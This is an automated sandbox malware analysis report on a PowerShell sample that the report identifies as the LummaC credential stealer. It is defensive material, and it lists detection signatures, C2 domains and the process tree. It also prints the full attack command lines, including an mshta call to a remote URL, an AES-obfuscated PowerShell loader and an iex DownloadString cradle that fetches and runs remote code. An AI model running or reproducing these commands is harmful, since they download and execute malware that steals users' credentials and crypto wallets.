Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
00000.ps1

Overview

General Information

Sample name:00000.ps1
Analysis ID:1580648
MD5:dcca21065d466d02dc563971e2981c0e
SHA1:5b3e32332d7d1f74261cc238c6e34b4c83b84a32
SHA256:52d2dff33cdb7cb2eb4e81e5ac6ad9e828d4df0c7c9a5fc2e96381c7f3cd7843
Tags:ps1user-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 2800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 3844 cmdline: "C:\Windows\system32\mshta.exe" https://scrutinycheck.cash/singl7.mp4 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 2996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7176 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8032 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • svchost.exe (PID: 4420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["necklacebudi.lat", "hushedocenahu.click", "crosshuaht.lat", "rapeflowwj.lat", "grannyejh.lat", "energyaffai.lat", "sustainskelet.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "yJEcaG--singl7"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 2996JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 2996INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x2b309e:$b1: ::WriteAllBytes(
        • 0x2b3614:$b1: ::WriteAllBytes(
        • 0x370b2:$s1: -join
        • 0x44187:$s1: -join
        • 0x47559:$s1: -join
        • 0x47c0b:$s1: -join
        • 0x496fc:$s1: -join
        • 0x4b902:$s1: -join
        • 0x4c129:$s1: -join
        • 0x4c999:$s1: -join
        • 0x4d0d4:$s1: -join
        • 0x4d106:$s1: -join
        • 0x4d14e:$s1: -join
        • 0x4d16d:$s1: -join
        • 0x4d9bd:$s1: -join
        • 0x4db39:$s1: -join
        • 0x4dbb1:$s1: -join
        • 0x4dc44:$s1: -join
        • 0x4deaa:$s1: -join
        • 0x50040:$s1: -join
        • 0x5ea8a:$s1: -join
        Process Memory Space: powershell.exe PID: 7176JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 7176INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xb944af:$b2: ::FromBase64String(
          • 0xbb33f2:$b2: ::FromBase64String(
          • 0x2b8289:$s1: -join
          • 0x2b8f0c:$s1: -join
          • 0x7dc685:$s1: -join
          • 0xb94372:$s1: -join
          • 0xbb32b5:$s1: -join
          • 0xbbfe86:$s1: -join
          • 0xbccf5b:$s1: -join
          • 0xbd032d:$s1: -join
          • 0xbd09df:$s1: -join
          • 0xbd24d0:$s1: -join
          • 0xbd46d6:$s1: -join
          • 0xbd4efd:$s1: -join
          • 0xbd576d:$s1: -join
          • 0xbd5ea8:$s1: -join
          • 0xbd5eda:$s1: -join
          • 0xbd5f22:$s1: -join
          • 0xbd5f41:$s1: -join
          • 0xbd6791:$s1: -join
          • 0xbd690d:$s1: -join
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            amsi64_2996.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7176.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://scrutinycheck.cash/singl7.mp4, CommandLine: "C:\Windows\system32\mshta.exe" https://scrutinycheck.cash/singl7.mp4, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2800, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://scrutinycheck.cash/singl7.mp4, ProcessId: 3844, ProcessName: mshta.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2996, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/sin
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B3749
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2996, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/sin
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00000.ps1", ProcessId: 2800, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF4550FA7E08728A080D7A6A09FF218A0A37CDF4EF3F6A50CCC9DDEE0D24287949B372601CA8769A11092428566941E5E81DC734A344A92E5B54939A7B808EA27414A69BECE50356ADA32AF76C66A7EED81FF79A3208EA6CA1E28D54700AB34FB6270B5B4EC13DA50EBF0B9BBAB023861142203272D6112A5A6D9726B68EF794031846478BC822C4C0391F73AD6DD169DCDF33D909E115BCFB9021A0D74ABB583032AC14EDAF563EB221F82DBE70815740F8F4F65B3993B4805F2F8DED176EF03650D5BA2D74E1919BECB701A86B2332083BFBE1C6D8903AB78E68721C77F780C3596EDC51E77');$jAMAa=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((eSNNy('49446F52676D7356434761614A6E6878')),[byte[]]::new(16)).TransformFinalBlock($lqmB,0,$lqmB.Length)); & $jAMAa.Substring(0,3) $jAMAa.Substring(129), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2996, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/sin
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://dma.sportstalk-musiclover.com/singl7.pst'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function eSNNy($MAvcZ){return -split ($MAvcZ -replace '..', '0x$& ')};$lqmB = eSNNy('5C3F827BAC65B5D2C8965D0BBCE1ED07B9B6786A8751F026D08EFD0A825F531A8D091C0ECDD11B3934B46C626B865735BAB41B512BE15DE11F5E12515F7078B31EE8399C0E805B1F986B48CD1FE4A4708FA30B93CA4F7E812CA54A8793D62D3598E2B95AF0842B9C9750010609AF477848F4D131B954661400575166055C03EF1B5DE596CF55C542063D3F91CE19CE97925E58F6C32246A890129F4332D50885100C3526774D0074EEC5D7A612D64456E89E2AAD35E8F4DCB634817B8F6E0AC4FA605341C50069355F250ADB57D33D199E78EDCF80294758E47CB522EDFFFE73CC1B919EF16AF41E32F5B6A9BF909AE30CEB1071E2D14015FB77F6298FF2B02FEBA7B2BEE205F03CF88FF6F6BEBEEC0309A6D27D56500B79ADD62DD9D50A9590F07C9425FF02C2062F0E3444952489CE539FE357B044D8F72560487A102CC157F9E4E5B39D9C8DEF45655607C7A2FDB595ECBD612595FE995C4B043F8955A8F51FB018D2638C4F3A04E4CE1F6F77607E28264761F8517127E32F9F8D159565861F352D53ED7157874F263F52A7E1025A408CACC8B208E7F7776300701055FD3D6C30CA49783C822471E5B37491DA64E22ECA5ACEAE2C26465A1465F8774B5536298C89DBC028CD0AE43DBABB7B1179BD528CA17B1C6D0B390408ECE7927FEAA32EA4FAF5B6249A55C0BB8FCE630BBE9577950A1C82CEB3F5B1CC3B4D16D0DD85009C2C1593600E9AD124BD3E71F96E9ECC581D41A94B73C3A20BF